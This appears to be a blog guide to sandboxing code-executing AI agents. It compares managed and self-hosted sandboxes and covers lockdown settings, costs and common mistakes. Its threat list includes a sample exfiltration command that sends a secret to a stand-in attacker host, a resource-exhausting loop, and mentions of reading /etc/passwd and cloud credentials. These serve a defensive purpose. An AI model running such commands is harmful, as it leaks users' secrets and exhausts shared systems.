Code-executing AI agents are now standard. ChatGPT runs Python; Claude Code executes commands; analytical agents spin up Python kernels. Where they execute matters as much as what they execute. This post is the working guide to sandboxed code execution for agents in 2026.
Why sandboxes
Agents run code based on user input, retrieved documents, or LLM-generated reasoning. All three are untrusted. Without isolation:
- Filesystem leakage —
/etc/passwd, AWS credentials, other users’ data. - Network exfiltration —
curl evil.com -d $secret. - Resource exhaustion —
while true; do :; done. - Privilege escalation — kernel exploits, container breakouts.
A sandbox is the answer. The question is which one.
The 2026 stack
| Type | Spin-up | Strengths | |
|---|---|---|---|
| E2B | Managed Firecracker | <500ms | Built for AI agents, code-interpreter shape, GitHub auth |
| Modal | Managed serverless | 1–2s | General compute, GPU support, big batches |
| Daytona | Managed dev envs | 2–5s | IDE-shaped, good for dev tools |
| Fly Machines | Managed Firecracker | 200ms | Generic, very cheap |
| AWS Lambda | Managed | <100ms | Mature, restrictive (no GPU, 15min limit) |
| Cloudflare Workers / Sandbox | Managed isolates | 10ms | V8 only, very fast, limited |
| Daytona / Codespaces | Containers | 3–10s | Persistent dev experience |
| Self-host Firecracker | Self-host | 200ms | Full control |
| gVisor | Self-host | 100ms | Container-style sandbox |
E2B — the AI-native choice
E2B is purpose-built for agents. Spin up a Linux VM in <500ms, run code, kill it.
from e2b_code_interpreter import Sandbox
with Sandbox() as sb:
result = sb.run_code("import pandas as pd; df = pd.read_csv('data.csv'); df.describe()")
print(result.text)
# Upload a file
sb.files.write("/tmp/script.py", "print('hi')")
# Run a shell command
out = sb.commands.run("ls -la /tmp")
What’s good:
- Fast spin-up. Firecracker microVM under the hood.
- Persistent state within a sandbox session.
- File and command APIs — most agent needs.
- Pre-installed Python, Node, etc. Agent doesn’t have to install pandas every time.
- Internet access (allowlist configurable).
For a code interpreter for an LLM, E2B is the path of least resistance.
Modal — when you need more
For larger workloads (longer runs, GPU, big batch jobs), Modal is the next step.
import modal
app = modal.App("agent-runner")
@app.function(image=modal.Image.debian_slim().pip_install("pandas", "scikit-learn"))
def analyze(csv_text: str) -> str:
import pandas as pd
from io import StringIO
df = pd.read_csv(StringIO(csv_text))
return df.describe().to_json()
# Call from agent:
result = analyze.remote(csv_data)
Modal scales bigger and supports GPUs. It’s not “spin-up-microVM-fast” — typical first call is 1–2s — but for longer jobs the difference is irrelevant.
Tool integration with an LLM
@tool
async def run_python(code: str) -> str:
"""Run Python code in a sandbox. Returns stdout + stderr."""
async with E2BSandbox() as sb:
try:
result = await sb.run_code(code, timeout=30)
return result.text or result.error or "(no output)"
except Exception as e:
return f"sandbox error: {e}"
Wire to an agent :
agent = create_agent(tools=[run_python])
result = await agent.ainvoke({"messages": [HumanMessage("calculate the variance of [1,2,3,4,5]")]})
The agent calls run_python with code; the sandbox executes; results flow back. Same shape as any tool call.
What to lock down
For each sandbox session, decide:
- Network: full / allowlist / none. Default to allowlist (the few APIs the agent should reach).
- Filesystem: scratch only / mount specific dirs / read-only.
- Time limit: 30 seconds is generous for most code; cap aggressively.
- Memory limit: 1 GB for code interpreters; less for narrow tasks.
- CPU limit: 1 core usually plenty.
- Egress data: cap bytes; alert on outliers.
E2B and Modal both expose these. Self-host and you set them yourself.
When self-hosted wins
- Strict compliance (data must not leave VPC).
- High volume (>100 sandboxes/min sustained — managed cost rises).
- Specific networking needs (custom egress filtering).
- Custom base images that aren’t a fit for managed.
For most teams under that threshold, managed (E2B / Modal) wins.
Common patterns
1. Per-conversation sandbox
The agent maintains one sandbox per user session. State persists across tool calls within the session. Killed at session end.
2. Per-call sandbox
Stateless: each run_python spins up fresh. Simple, slower, sometimes wasteful (re-imports pandas every call).
3. Pool of warm sandboxes
For low-latency apps, keep N sandboxes warm. New requests grab from the pool. Slightly more ops; sub-100ms response.
4. Sandboxed agents (recursive)
The whole agent runs in a sandbox. Useful when the agent itself is untrusted (running user-uploaded prompts).
Cost reality
E2B: ~$0.0002/second of sandbox time. A typical query (5 seconds) costs $0.001. At 100k queries/day: $100/day, $3k/month.
Self-hosted Firecracker on cheap VMs: ~$0.00001/sec. Same query = $0.00005. At scale, self-host is dramatically cheaper. Below scale, the ops cost eats the savings.
Common mistakes
1. No timeout
Agent’s bug → infinite loop → sandbox bills accumulate. Always cap.
2. Network wide-open
The agent emits curl, exfils data. Always allowlist.
3. State across users
Reusing a sandbox between users → previous user’s secrets in env vars/filesystem. Always fresh per user.
4. Logging code without redaction
The user might paste an API key into a code block. Logged code = leaked key. Filter or hash before logging.
5. No resource caps
A misbehaving agent can OOM the sandbox host. Caps protect everyone.
What I’d build today
For a new agent product that runs code:
- E2B for the sandbox (managed, fast, agent-shaped).
- A
run_pythonandrun_shelltool wired to the agent. - Sandbox per user session, killed on disconnect.
- 30-second timeout, 1 GB memory cap by default.
- Network allowlist for the APIs the agent should reach.
- Logging + alerting on long runs and failed sandboxes.
Pair with the LLM Security in 2026 defenses — sandbox is one layer in a defense-in-depth strategy.
Read this next
- LLM Security — Prompt Injection
- AI Agents with LangGraph
- Build an MCP Server for Your SaaS
- Cilium and eBPF in Production
If you want a working agent + E2B + tool-call template, it’s at rajpoot.dev .
Building something AI-, backend-, or data-heavy and want a second pair of eyes? I do consulting and freelance work — see my projects and ways to reach me at rajpoot.dev .